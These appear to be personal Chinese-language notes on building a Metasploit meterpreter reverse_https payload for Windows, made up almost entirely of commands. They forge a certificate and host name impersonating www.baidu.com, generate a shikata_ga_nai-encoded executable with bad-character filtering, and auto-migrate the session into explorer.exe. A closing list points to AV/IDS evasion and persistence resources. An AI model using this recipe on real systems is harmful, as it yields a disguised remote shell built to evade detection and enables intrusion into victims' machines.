metasploit使用笔记

---

开启

db_connect ./database.yml
use payload/windows/meterpreter/reverse_https
set overridelhost www.baidu.com
set OverrideRequestHost true
set OverrideLPORT 443
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
    -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.baidu.com" \
    -keyout www.baidu.com.key \
    -out www.baidu.com.crt && \
cat www.baidu.com.key  www.baidu.com.crt > www.baidu.com.pem && \
rm -f www.baidu.com.key  www.baidu.com.crt
set handlersslcert ./www.baidu.com.pem
set StagerVerifySSLCert=true
set EnableStageEncoding true
generate -E -b '\x00\xff' -f /tmp/baidu.com.exe -t exe -a x86 --platform win -e x86/shikata_ga_nai -i 2
set autorunscript post/windows/manage/migrate NAME=explorer.exe

windows server 2003 sp2 测试不能连接成功,win2008 win7 win10均无问题

引用

• Meterpreter Paranoid Mode
• Staged Payloads – What Pen Testers Should Know
• 阶段编码
• Meterpreter stage AV/IDS evasion with powershell
• Metasploit Meterpreter Persistence Script Alternatives
• metasploit loader